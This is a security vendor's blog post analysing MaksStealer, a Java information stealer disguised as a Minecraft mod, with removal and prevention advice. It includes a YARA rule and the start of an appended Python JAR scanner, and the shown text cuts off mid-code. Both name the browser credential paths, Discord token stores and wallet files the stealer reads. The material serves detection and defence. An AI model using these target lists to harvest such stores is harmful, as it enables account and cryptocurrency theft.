{"id":31021,"date":"2025-05-20T16:58:18","date_gmt":"2025-05-20T16:58:18","guid":{"rendered":"https:\/\/gridinsoft.com\/blogs\/?p=31021"},"modified":"2025-05-20T17:17:36","modified_gmt":"2025-05-20T17:17:36","slug":"maksstealer-malware-analysis-removal","status":"publish","type":"post","link":"https:\/\/gridinsoft.com\/blogs\/maksstealer-malware-analysis-removal\/","title":{"rendered":"MaksStealer (MaxCoffe): The Minecraft Mod That&#8217;s Actually Stealing Your Passwords"},"content":{"rendered":"<p><strong>For Minecraft Gamers<\/strong>: MaksStealer (also tracked as MaxCoffe, after the Forge mod ID it registers) is an information-stealing trojan aimed at Minecraft players, especially those on the popular Hypixel SkyBlock server. It is offered as a mod that boosts performance or provides cheats, but once launched it collects your browser passwords, Discord session tokens and cryptocurrency wallet files and ships them off to the attackers.<\/p>\r\n<p>I&#8217;ve analyzed dozens of these gaming-related malware strains, and this one is particularly sneaky. Let&#8217;s break down what MaksStealer is, how it works, and most importantly &#8211; how to kick it off your system before it empties your crypto wallets.<\/p>\r\n\r\n    <h2>MaksStealer Malware<\/h2>\r\n    <table class=\"table-summary\">\r\n        <tr>\r\n            <td>Threat Type<\/td>\r\n            <td>Information Stealer, Trojan<\/td>\r\n        <\/tr>\r\n        <tr>\r\n            <td>Disguise<\/td>\r\n            <td>Minecraft Hypixel SkyBlock performance mod\/cheat<\/td>\r\n        <\/tr>\r\n        <tr>\r\n            <td>What It Steals<\/td>\r\n            <td>Browser credentials, Discord tokens, cryptocurrency wallets<\/td>\r\n        <\/tr>\r\n        <tr>\r\n            <td>Distribution<\/td>\r\n            <td>Gaming forums, YouTube comments, Discord servers, pirated software<\/td>\r\n        <\/tr>\r\n        <tr>\r\n            <td>Detection Names<\/td>\r\n            <td>Trojan.MaxCoffe, Trojan.GenericKD.76438532, Java\/MaksRat.B, HEUR:Trojan-PSW.Java.Stealer.gen<\/td>\r\n        
<\/tr>\r\n        <tr>\r\n            <td>Risk Level<\/td>\r\n            <td>High (financial loss, account theft, privacy breach)<\/td>\r\n        <\/tr>\r\n    <\/table>\r\n\r\n\r\n<svg width=\"100%\" height=\"420\" viewBox=\"0 0 800 420\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\">\r\n    <!-- Title -->\r\n    <text x=\"400\" y=\"40\" font-family=\"Arial, sans-serif\" font-size=\"18\" font-weight=\"bold\" text-anchor=\"middle\" fill=\"#333\">MaksStealer Infection<\/text>\r\n    \r\n    <!-- Background -->\r\n    <rect x=\"50\" y=\"70\" width=\"700\" height=\"300\" fill=\"#f8f8f8\" stroke=\"#ddd\" stroke-width=\"1\" \/>\r\n    \r\n    <!-- Flow Chart Elements -->\r\n    <rect x=\"100\" y=\"100\" width=\"160\" height=\"70\" rx=\"5\" fill=\"#333\" \/>\r\n    <text x=\"180\" y=\"135\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">Gaming Forums<\/text>\r\n    <text x=\"180\" y=\"155\" font-family=\"Arial, sans-serif\" font-size=\"12\" text-anchor=\"middle\" fill=\"#fff\">&#8220;Free Minecraft Mods&#8221;<\/text>\r\n    \r\n    <rect x=\"320\" y=\"100\" width=\"160\" height=\"70\" rx=\"5\" fill=\"#555\" \/>\r\n    <text x=\"400\" y=\"135\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">Download .JAR File<\/text>\r\n    <text x=\"400\" y=\"155\" font-family=\"Arial, sans-serif\" font-size=\"12\" text-anchor=\"middle\" fill=\"#fff\">&#8220;CasinoEssentials.jar&#8221;<\/text>\r\n    \r\n    <rect x=\"540\" y=\"100\" width=\"160\" height=\"70\" rx=\"5\" fill=\"#777\" \/>\r\n    <text x=\"620\" y=\"135\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">User Runs the Mod<\/text>\r\n    <text x=\"620\" y=\"155\" font-family=\"Arial, sans-serif\" font-size=\"12\" text-anchor=\"middle\" fill=\"#fff\">&#8220;Java -jar filename.jar&#8221;<\/text>\r\n    \r\n    <rect x=\"100\" y=\"230\" width=\"160\" height=\"70\" rx=\"5\" fill=\"#555\" \/>\r\n    <text 
x=\"180\" y=\"265\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">Stealer Activates<\/text>\r\n    <text x=\"180\" y=\"285\" font-family=\"Arial, sans-serif\" font-size=\"12\" text-anchor=\"middle\" fill=\"#fff\">Runs in background<\/text>\r\n    \r\n    <rect x=\"320\" y=\"230\" width=\"160\" height=\"70\" rx=\"5\" fill=\"#777\" \/>\r\n    <text x=\"400\" y=\"265\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">Data Collection<\/text>\r\n    <text x=\"400\" y=\"285\" font-family=\"Arial, sans-serif\" font-size=\"12\" text-anchor=\"middle\" fill=\"#fff\">Browsers, Discord, Crypto<\/text>\r\n    \r\n    <rect x=\"540\" y=\"230\" width=\"160\" height=\"70\" rx=\"5\" fill=\"#333\" \/>\r\n    <text x=\"620\" y=\"265\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">Data Exfiltration<\/text>\r\n    <text x=\"620\" y=\"285\" font-family=\"Arial, sans-serif\" font-size=\"12\" text-anchor=\"middle\" fill=\"#fff\">Sends to attacker servers<\/text>\r\n    \r\n    <!-- Arrows -->\r\n    <line x1=\"260\" y1=\"135\" x2=\"320\" y2=\"135\" stroke=\"#333\" stroke-width=\"2\" \/>\r\n    <polygon points=\"315,130 320,135 315,140\" fill=\"#333\" \/>\r\n    \r\n    <line x1=\"480\" y1=\"135\" x2=\"540\" y2=\"135\" stroke=\"#333\" stroke-width=\"2\" \/>\r\n    <polygon points=\"535,130 540,135 535,140\" fill=\"#333\" \/>\r\n    \r\n    <line x1=\"620\" y1=\"170\" x2=\"620\" y2=\"200\" stroke=\"#333\" stroke-width=\"2\" \/>\r\n    <line x1=\"620\" y1=\"200\" x2=\"180\" y2=\"200\" stroke=\"#333\" stroke-width=\"2\" \/>\r\n    <line x1=\"180\" y1=\"200\" x2=\"180\" y2=\"230\" stroke=\"#333\" stroke-width=\"2\" \/>\r\n    <polygon points=\"175,225 180,230 185,225\" fill=\"#333\" \/>\r\n    \r\n    <line x1=\"260\" y1=\"265\" x2=\"320\" y2=\"265\" stroke=\"#333\" stroke-width=\"2\" \/>\r\n    <polygon points=\"315,260 320,265 315,270\" fill=\"#333\" \/>\r\n    \r\n    
<line x1=\"480\" y1=\"265\" x2=\"540\" y2=\"265\" stroke=\"#333\" stroke-width=\"2\" \/>\r\n    <polygon points=\"535,260 540,265 535,270\" fill=\"#333\" \/>\r\n<\/svg>\r\n<p class=\"chart-source\"><em>Source: Analysis of MaksStealer behavior from Triage and VirusTotal findings, May 2025<\/em><\/p>\r\n\r\n\r\n<h2>What Is MaksStealer and How Bad Is It?<\/h2>\r\n\r\n<p>MaksStealer is a Java-based information stealer packaged as a Minecraft Forge mod and aimed squarely at gamers. It presents itself as a performance or cheat mod for Minecraft&#8217;s Hypixel SkyBlock, but once loaded it harvests every piece of valuable data it can reach. It is especially damaging because it goes after several data types in a single pass &#8211; browser passwords and cookies, Discord and other gaming accounts, and cryptocurrency wallets.<\/p>\r\n\r\n<p>Unlike malware that announces itself with popups or system slowdowns, MaksStealer works silently in the background. You won&#8217;t know it&#8217;s there until your accounts start getting hijacked or your crypto mysteriously disappears. That stealth makes it particularly dangerous for everyday users who aren&#8217;t constantly monitoring their system processes.<\/p>\r\n\r\n<h2>How This Digital Pickpocket Works<\/h2>\r\n\r\n<p>Once executed, MaksStealer immediately starts scanning your system for valuable data. It runs with your own user account&#8217;s permissions, so it can read anything you can read, and it focuses on three main categories:<\/p>\r\n\r\n<h3>1. Web Browser Theft<\/h3>\r\n\r\n<p>MaksStealer doesn&#8217;t play favorites &#8211; Chrome, Firefox, Edge, Opera, Brave, Vivaldi, and Yandex are all on its list. It walks each browser&#8217;s profile directory and extracts saved passwords, cookies, autofill data, and browsing history. The cookies matter as much as the passwords: a valid session cookie lets an attacker straight into a site you are logged into, with no password and no two-factor prompt.<\/p>\r\n\r\n<p>Think about all those sites where you&#8217;ve clicked &#8220;remember password&#8221; for convenience. Banking sites, email, social media, online shopping &#8211; MaksStealer can now access all of them.\r\n
It&#8217;s like handing over your entire digital identity on a silver platter.<\/p>\r\n\r\n<h3>2. Discord Account Targeting<\/h3>\r\n\r\n<p>For gamers, Discord is often the communication hub for everything. MaksStealer specifically looks for Discord authentication tokens, which the desktop client keeps in its Local Storage leveldb folder under your user profile (the standard and Canary builds each have their own). A token is in effect a digital key to your Discord account.<\/p>\r\n\r\n<p>With your token, attackers can use your Discord account without knowing your password and without triggering two-factor authentication, because the token is what Discord hands out after a login has already passed those checks. They can then impersonate you, message your friends with malware links, join private servers, or read private conversations. That is also how the malware spreads further through gaming communities: the next victim receives the link from someone they trust.<\/p>\r\n\r\n<h3>3. Cryptocurrency Wallet Raiding<\/h3>\r\n\r\n<p>Perhaps most financially damaging is MaksStealer&#8217;s ability to target cryptocurrency wallets. It searches for popular wallet software like Armory, Bytecoin, Coinomi, Exodus, Ethereum, Electrum, Atomic Wallet, and many others, and copies the wallet files it finds (wallet.dat, keystore directories, Electrum wallet files) together with any private keys or seed phrases stored in them.<\/p>\r\n\r\n<p>Once attackers have this data, your cryptocurrency can be transferred away in minutes. Because blockchain transactions are irreversible and there is no operator who can undo them, the funds are virtually impossible to recover.\r\n
One moment your digital wallet is full, the next it&#8217;s emptied with no recourse.<\/p>\r\n<figure id=\"attachment_31027\" aria-describedby=\"caption-attachment-31027\" style=\"width: 942px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/05\/maksstealer-browser-targets-942x1024.png\" alt=\"MaksStealer target browsers shown\" width=\"942\" height=\"1024\" class=\"size-large wp-image-31027\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/05\/maksstealer-browser-targets-942x1024.png 942w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/05\/maksstealer-browser-targets-276x300.png 276w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/05\/maksstealer-browser-targets-768x835.png 768w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/05\/maksstealer-browser-targets-1412x1536.png 1412w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/05\/maksstealer-browser-targets-860x935.png 860w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/05\/maksstealer-browser-targets-1536x1671.png 1536w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/05\/maksstealer-browser-targets.png 1598w\" sizes=\"auto, (max-width: 942px) 100vw, 942px\" \/><figcaption id=\"caption-attachment-31027\" class=\"wp-caption-text\">MaksStealer code showing targeted browsers for credential theft (Source: <a href=\"https:\/\/tria.ge\/250516-k46wfssjz7\" rel=\"nofollow noopener\" target=\"_blank\">Triage analysis<\/a>)<\/figcaption><\/figure>\r\n\r\n<h2>How MaksStealer Spreads: The Bait and Switch<\/h2>\r\n\r\n<p>Malware distributors are getting creative with their delivery methods. 
MaksStealer typically spreads through channels that gamers frequently use and trust:<\/p>\r\n\r\n<ul>\r\n    <li><strong>Gaming Forums:<\/strong> Posts claiming to offer performance enhancements or &#8220;legal&#8221; cheats for Minecraft<\/li>\r\n    <li><strong>YouTube Comments:<\/strong> Links in comment sections of Minecraft tutorials or gameplay videos<\/li>\r\n    <li><strong>Discord Servers:<\/strong> Malicious users sharing &#8220;exclusive&#8221; mods in gaming servers<\/li>\r\n    <li><strong>Unofficial Mod Sites:<\/strong> Fake or compromised websites hosting malicious JAR files<\/li>\r\n    <li><strong>Pirated Game Portals:<\/strong> Bundled with cracked game versions or key generators<\/li>\r\n<\/ul>\r\n\r\n<p>The common element is social engineering. The attackers know gamers are often looking for ways to enhance their gameplay or get an edge. They&#8217;re exploiting that desire by packaging their malware as something beneficial. It&#8217;s like offering someone a performance-enhancing drink that&#8217;s actually poison.<\/p>\r\n\r\n<p>What makes this distribution method particularly effective is that gamers are already accustomed to downloading and running third-party software. Minecraft&#8217;s massive modding community has created an environment where running JAR files is normalized. 
MaksStealer exploits this trust.<\/p>\r\n\r\n\r\n<svg width=\"100%\" height=\"420\" viewBox=\"0 0 800 420\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\">\r\n    <!-- Title -->\r\n    <text x=\"400\" y=\"40\" font-family=\"Arial, sans-serif\" font-size=\"18\" font-weight=\"bold\" text-anchor=\"middle\" fill=\"#333\">What MaksStealer Targets<\/text>\r\n    \r\n    <!-- Background -->\r\n    <rect x=\"100\" y=\"70\" width=\"600\" height=\"300\" fill=\"#f8f8f8\" stroke=\"#ddd\" stroke-width=\"1\" \/>\r\n    \r\n    <!-- Data Types -->\r\n    <rect x=\"150\" y=\"100\" width=\"500\" height=\"50\" rx=\"5\" fill=\"#333\" \/>\r\n    <text x=\"400\" y=\"130\" font-family=\"Arial, sans-serif\" font-size=\"16\" text-anchor=\"middle\" fill=\"#fff\">Browser Credentials<\/text>\r\n    \r\n    <rect x=\"150\" y=\"170\" width=\"500\" height=\"50\" rx=\"5\" fill=\"#555\" \/>\r\n    <text x=\"400\" y=\"200\" font-family=\"Arial, sans-serif\" font-size=\"16\" text-anchor=\"middle\" fill=\"#fff\">Discord Tokens<\/text>\r\n    \r\n    <rect x=\"150\" y=\"240\" width=\"500\" height=\"50\" rx=\"5\" fill=\"#777\" \/>\r\n    <text x=\"400\" y=\"270\" font-family=\"Arial, sans-serif\" font-size=\"16\" text-anchor=\"middle\" fill=\"#fff\">Cryptocurrency Wallets<\/text>\r\n    \r\n    <rect x=\"150\" y=\"310\" width=\"500\" height=\"50\" rx=\"5\" fill=\"#999\" \/>\r\n    <text x=\"400\" y=\"340\" font-family=\"Arial, sans-serif\" font-size=\"16\" text-anchor=\"middle\" fill=\"#fff\">System Information<\/text>\r\n    \r\n    <!-- Connection Lines -->\r\n    <line x1=\"150\" y1=\"125\" x2=\"120\" y2=\"125\" stroke=\"#333\" stroke-width=\"1\" \/>\r\n    <line x1=\"120\" y1=\"125\" x2=\"120\" y2=\"340\" stroke=\"#333\" stroke-width=\"1\" \/>\r\n    <line x1=\"120\" y1=\"340\" x2=\"150\" y2=\"340\" stroke=\"#333\" stroke-width=\"1\" \/>\r\n    <line x1=\"120\" y1=\"195\" x2=\"150\" y2=\"195\" stroke=\"#333\" stroke-width=\"1\" \/>\r\n    <line x1=\"120\" y1=\"265\" x2=\"150\" y2=\"265\" stroke=\"#333\" 
stroke-width=\"1\" \/>\r\n    \r\n    <!-- Indicators -->\r\n    <circle cx=\"120\" cy=\"125\" r=\"5\" fill=\"#333\" \/>\r\n    <circle cx=\"120\" cy=\"195\" r=\"5\" fill=\"#333\" \/>\r\n    <circle cx=\"120\" cy=\"265\" r=\"5\" fill=\"#333\" \/>\r\n    <circle cx=\"120\" cy=\"340\" r=\"5\" fill=\"#333\" \/>\r\n    \r\n    <!-- Browser Logos -->\r\n    <circle cx=\"680\" cy=\"100\" r=\"10\" fill=\"#666\" \/>\r\n    <text x=\"680\" y=\"104\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#fff\">C<\/text>\r\n    <circle cx=\"680\" cy=\"125\" r=\"10\" fill=\"#666\" \/>\r\n    <text x=\"680\" y=\"129\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#fff\">F<\/text>\r\n    <circle cx=\"680\" cy=\"150\" r=\"10\" fill=\"#666\" \/>\r\n    <text x=\"680\" y=\"154\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#fff\">E<\/text>\r\n    \r\n    <!-- Wallet Icons -->\r\n    <rect x=\"670\" y=\"240\" width=\"20\" height=\"10\" rx=\"2\" fill=\"#666\" \/>\r\n    <rect x=\"670\" y=\"255\" width=\"20\" height=\"10\" rx=\"2\" fill=\"#666\" \/>\r\n    <rect x=\"670\" y=\"270\" width=\"20\" height=\"10\" rx=\"2\" fill=\"#666\" \/>\r\n<\/svg>\r\n<p class=\"chart-source\"><em>Source: Data types targeted by MaksStealer based on behavioral analysis<\/em><\/p>\r\n\r\n\r\n<h2>Warning Signs Your System Might Be Infected<\/h2>\r\n\r\n<p>MaksStealer is designed to operate stealthily, but there are some subtle signs that might indicate infection:<\/p>\r\n\r\n<ul>\r\n    <li><strong>Unexplained Account Activity:<\/strong> Logins to your accounts from unknown locations or devices<\/li>\r\n    <li><strong>Missing Cryptocurrency:<\/strong> Unexplained transactions or emptied wallets<\/li>\r\n    <li><strong>Strange Discord Messages:<\/strong> Messages sent from your account that you didn&#8217;t write<\/li>\r\n    <li><strong>Performance Issues:<\/strong> While running in the background, 
MaksStealer may cause slight system slowdowns<\/li>\r\n    <li><strong>Unusual Network Traffic:<\/strong> Increased data usage when you&#8217;re not actively downloading<\/li>\r\n    <li><strong>Java Process Running:<\/strong> A Java process that keeps running after you close Minecraft, or one launched from a JAR you just downloaded rather than by the game launcher<\/li>\r\n<\/ul>\r\n\r\n<p>If you notice any of these signs after downloading and running a new Minecraft mod or tool, act immediately. Information stealers upload what they find within seconds of starting, so every minute counts in limiting further data theft.<\/p>\r\n\r\n<p>You can list the Java processes on a Windows machine, together with the command line each was started with, using PowerShell:<\/p>\r\n\r\n<pre class=\"brush: powershell; title: ; notranslate\" title=\"\">\r\n# List Java processes with the command line they were started with.\r\n# java.exe itself lives in a legitimate JRE folder, so its Path tells you little;\r\n# what matters is the JAR named after -jar and where that JAR lives.\r\nGet-CimInstance Win32_Process -Filter &quot;Name LIKE 'java%'&quot; |\r\nSelect-Object ProcessId, Name, CreationDate, CommandLine |\r\nFormat-Table -AutoSize -Wrap\r\n\r\n# Narrow down to processes whose command line mentions the mod ID or the stealer class name\r\nGet-CimInstance Win32_Process |\r\nWhere-Object { $_.CommandLine -like &quot;*MaxCoffe*&quot; -or $_.CommandLine -like &quot;*Coffe*&quot; } |\r\nSelect-Object ProcessId, Name, CommandLine\r\n<\/pre>\r\n\r\n<p>Suspicious indicators include a -jar argument pointing into Downloads, Temp or anywhere else outside your Minecraft mods folder, a recently started Java process you don&#8217;t recognize, or &#8220;MaxCoffe&#8221; anywhere in the command line. Bear in mind that Minecraft itself is a Java process, so the goal is to spot the extra or out-of-place one, not Java as such.<\/p>\r\n\r\n<p>For Linux or macOS users, the equivalent checks in Bash:<\/p>\r\n\r\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\n# List all Java processes with their full command line\r\n# (the [j] trick keeps grep from matching its own command line)\r\nps aux | grep -i '[j]ava'\r\n\r\n# Narrow down to processes with MaxCoffe or Coffe in their arguments\r\nps aux | grep -i '[j]ava' | grep -E 'MaxCoffe|Coffe'\r\n\r\n# JAR files changed in the last 7 days anywhere under your home directory, which covers\r\n# the mods folder (~\/.minecraft\/mods on Linux, ~\/Library\/Application Support\/minecraft\/mods\r\n# on macOS) as well as Downloads\r\nfind ~ -name '*.jar' -mtime -7 -ls 2&gt;\/dev\/null\r\n<\/pre>\r\n\r\n<p>Security researchers can also use this YARA rule to detect potential\r\n
MaksStealer samples:<\/p>\r\n\r\n<pre class=\"brush: yaml; title: ; notranslate\" title=\"\">\r\n\/\/ Run this rule against the extracted .class files or against decompiled source.\r\n\/\/ YARA does not unpack ZIP containers, so scanning the .jar itself will miss the\r\n\/\/ compressed class entries.\r\nrule MaksStealer_Java_InfoStealer {\r\n    meta:\r\n        description = &quot;Detects MaksStealer (MaxCoffe) Java information stealer&quot;\r\n        author = &quot;GridinSoft Security Researcher&quot;\r\n        date = &quot;2025-05&quot;\r\n        severity = &quot;high&quot;\r\n        hash = &quot;9a17f87dcd2208f8f62ed76a15a6c52817008e77179c8b1f7f39c079d419f398&quot;\r\n\r\n    strings:\r\n        \/\/ Forge mod marker. The annotation line only reads this way in decompiled source;\r\n        \/\/ a compiled class stores the annotation descriptor and the mod ID as separate\r\n        \/\/ constant-pool strings, so both forms are covered.\r\n        $mod_src = &quot;modid = \\&quot;MaxCoffe\\&quot;&quot; ascii\r\n        $mod_cls = &quot;net\/minecraftforge\/fml\/common\/Mod&quot; ascii\r\n        $mod_id = &quot;MaxCoffe&quot; ascii\r\n        \r\n        $browser1 = &quot;\\\\Google\\\\Chrome\\\\User Data&quot; ascii\r\n        $browser2 = &quot;\\\\Mozilla\\\\Firefox\\\\Profiles&quot; ascii\r\n        $browser3 = &quot;\\\\BraveSoftware\\\\Brave-Browser&quot; ascii\r\n        \r\n        $discord1 = &quot;\\\\discord\\\\Local Storage\\\\leveldb&quot; ascii\r\n        $discord2 = &quot;\\\\discordcanary\\\\Local Storage\\\\leveldb&quot; ascii\r\n        \r\n        $crypto1 = &quot;\\\\Bitcoin\\\\wallet.dat&quot; ascii\r\n        $crypto2 = &quot;\\\\Ethereum\\\\keystore&quot; ascii\r\n        $crypto3 = &quot;\\\\Electrum\\\\wallets&quot; ascii\r\n        \r\n        \/\/ Obfuscated identifiers made only of l and I. The forms with ( and [ appear in\r\n        \/\/ decompiled source; the bare name also appears in compiled class files.\r\n        $obf_pattern1 = &quot;lIIl(&quot; ascii\r\n        $obf_pattern2 = &quot;lII&#x5B;lll&#x5B;&quot; ascii\r\n        $obf_pattern3 = &quot;lllllllllllIIlI&quot; ascii\r\n\r\n    condition:\r\n        ($mod_src or ($mod_cls and $mod_id)) and\r\n        (2 of ($browser*)) and\r\n        (1 of ($discord*)) and\r\n        (1 of ($crypto*)) and\r\n        (1 of ($obf_pattern*))\r\n}\r\n<\/pre>\r\n\r\n<h2>How to Remove MaksStealer From Your System<\/h2>\r\n\r\n<p>If you suspect you&#8217;ve been infected with MaksStealer, follow these steps to remove it:<\/p>\r\n\r\n<h3>Step 1: Disconnect from the Internet<\/h3>\r\n\r\n<p>Immediately disconnect your computer from the internet. This stops the malware from sending any more of your data to the attackers&#8217; servers or receiving additional commands. Be realistic about what this buys you, though: a stealer typically uploads what it found within seconds of starting, so assume the data that was on disk is already in the attackers&#8217; hands and move quickly through the account-reset steps below.\r\n
You can reconnect once the malware is removed.<\/p>\r\n\r\n<h3>Step 2: Scan with Antimalware Software<\/h3>\r\n\r\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main.webp\" alt=\"GridinSoft Anti-Malware main screen\" width=\"886\" height=\"689\" class=\"aligncenter size-full wp-image-22665\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main.webp 886w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main-300x233.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main-768x597.webp 768w\" sizes=\"auto, (max-width: 886px) 100vw, 886px\" \/>\n<p>Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.<\/p>\n<div style=\"text-align:center\"><a href=\"\/download\/antimalware\" class=\"btn border-black\" rel=\"nofollow\">Download Anti-Malware<\/a><\/div>\n<p>After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click \"Advanced mode\" and see the options in the drop-down menus. 
You can also see extended information about each detection - malware type, effects and potential source of infection.<\/p>\n<img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result.webp\" alt=\"Scan results screen\" width=\"886\" height=\"689\" class=\"aligncenter size-full wp-image-22666\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result.webp 886w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result-300x233.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result-768x597.webp 768w\" sizes=\"auto, (max-width: 886px) 100vw, 886px\" \/>\n<p>Click \"Clean Now\" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt it, and you will get your system as clean as new.<\/p>\n<img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean.webp\" alt=\"Removal finished\" width=\"886\" height=\"689\" class=\"aligncenter size-full wp-image-22667\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean.webp 886w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean-300x233.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean-768x597.webp 768w\" sizes=\"auto, (max-width: 886px) 100vw, 886px\" \/>\r\n\r\n<p>After scanning with anti-malware software, finish with some manual cleanup: delete the downloaded JAR itself, plus any copy of it in your Minecraft mods folder or in the folder you launched it from, so that nothing can start it again.<\/p>\r\n\r\n<h3>Step 3: Reset Your Passwords and Secure Accounts<\/h3>\r\n\r\n<p>After removing the malware, immediately change passwords for all your important accounts.\r\n
Start with email accounts, banking websites, and cryptocurrency platforms. Use a different, clean device for these password changes if possible, since anything the stealer dropped might still be running on the infected one. Where a site offers it, also sign out of all other sessions: changing a password does not always invalidate cookies that were already stolen.<\/p>\r\n\r\n<p>Enable two-factor authentication on all accounts that support it. This provides an additional layer of security even if your passwords are compromised. For Discord specifically, changing your password invalidates the stolen token, because Discord signs out every session when the password changes; also review the active sessions (Devices) in your Discord settings and log out any you don&#8217;t recognize.<\/p>\r\n\r\n<h3>Step 4: Secure Your Cryptocurrency<\/h3>\r\n\r\n<p>If you have cryptocurrency wallets, create new wallets with fresh keys and transfer any remaining funds immediately. Consider the old wallets permanently compromised, passphrase or not: once the wallet file has been copied, the passphrase can be guessed offline at leisure. Hardware wallets are a more secure option for storing significant amounts, as the private keys never leave the device, so a stealer that copies files from your disk gets nothing it can spend.<\/p>\r\n\r\n<h2>How to Protect Yourself From Information Stealers<\/h2>\r\n\r\n<p>Prevention is always better than cure, especially with information stealers. Here&#8217;s how to stay safe:<\/p>\r\n\r\n<ul>\r\n    <li><strong>Download mods only from official sources<\/strong> like CurseForge or the official Minecraft forums<\/li>\r\n    <li><strong>Be suspicious of &#8220;too good to be true&#8221; mods<\/strong> offering extraordinary features or cheats<\/li>\r\n    <li><strong>Keep your system and antivirus updated<\/strong> to protect against known threats<\/li>\r\n    <li><strong>Use a password manager<\/strong> instead of saving passwords in your browser, since the browser&#8217;s password store is exactly what the stealer reads<\/li>\r\n    <li><strong>Enable two-factor authentication<\/strong> on all important accounts<\/li>\r\n    <li><strong>Consider a hardware wallet<\/strong> for storing significant amounts of cryptocurrency<\/li>\r\n    <li><strong>Scan downloaded files<\/strong> with antivirus before executing them<\/li>\r\n    <li><strong>Be cautious of links in Discord servers, YouTube comments, and forums<\/strong> from unknown users<\/li>\r\n<\/ul>\r\n\r\n<p>Remember that Java files (.JAR) are executable programs.\r\n
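<\/p>
<p>The YARA rule earlier on this page is written against decompiled source: the modid = &#8220;MaxCoffe&#8221; assignment and the lIIl( call are how a decompiler prints an annotation and a method call, whereas a compiled .class file stores modid, MaxCoffe, the annotation descriptor and each method name as separate constant-pool strings, and YARA does not unpack ZIP containers, so running the rule on a downloaded .jar as-is will miss. The script below is an added example (my own code, not GridinSoft&#8217;s tooling and not taken from the malware) that does the check a JAR actually needs: it opens every entry, pulls the CONSTANT_Utf8 strings out of each class file&#8217;s constant pool, normalises path separators, and applies the same indicator groups as the rule. The two sample JARs are constructed in memory from synthetic class files that contain nothing but a constant pool, and the descriptor net\/minecraftforge\/fml\/common\/Mod is an assumption about how the Forge @Mod annotation appears in bytecode.<\/p>

```python
import io
import json
import struct
import sys
import zipfile

BACKSLASH = chr(92)  # spelled out so the page's JSON escaping cannot mangle a literal backslash

# Indicator strings from the YARA rule on this page, separator normalised to '/' so a sample
# that builds paths with File.separator or forward slashes still matches.
BROWSER_PATHS = ('Google/Chrome/User Data', 'Mozilla/Firefox/Profiles', 'BraveSoftware/Brave-Browser')
DISCORD_PATHS = ('discord/Local Storage/leveldb', 'discordcanary/Local Storage/leveldb')
WALLET_PATHS = ('Bitcoin/wallet.dat', 'Ethereum/keystore', 'Electrum/wallets')
MOD_ID = 'MaxCoffe'
FORGE_MOD_DESCRIPTOR = 'net/minecraftforge/fml/common/Mod'  # assumption: bytecode form of Forge's @Mod

# Payload size of every constant-pool tag except CONSTANT_Utf8 (tag 1, variable length)
CP_FIXED_SIZE = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
                 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}


def class_utf8_constants(data):
    """Return every CONSTANT_Utf8 entry of a .class file: names, descriptors and string literals."""
    if data[:4] != bytes.fromhex('CAFEBABE'):
        return []
    count = struct.unpack('>H', data[8:10])[0]
    pos, index, found = 10, 1, []
    while index < count and pos < len(data):
        tag = data[pos]
        if tag == 1:
            length = struct.unpack('>H', data[pos + 1:pos + 3])[0]
            found.append(data[pos + 3:pos + 3 + length].decode('utf-8', 'replace'))
            pos += 3 + length
        elif tag in CP_FIXED_SIZE:
            pos += 1 + CP_FIXED_SIZE[tag]
        else:
            break  # malformed pool: keep what was parsed so far
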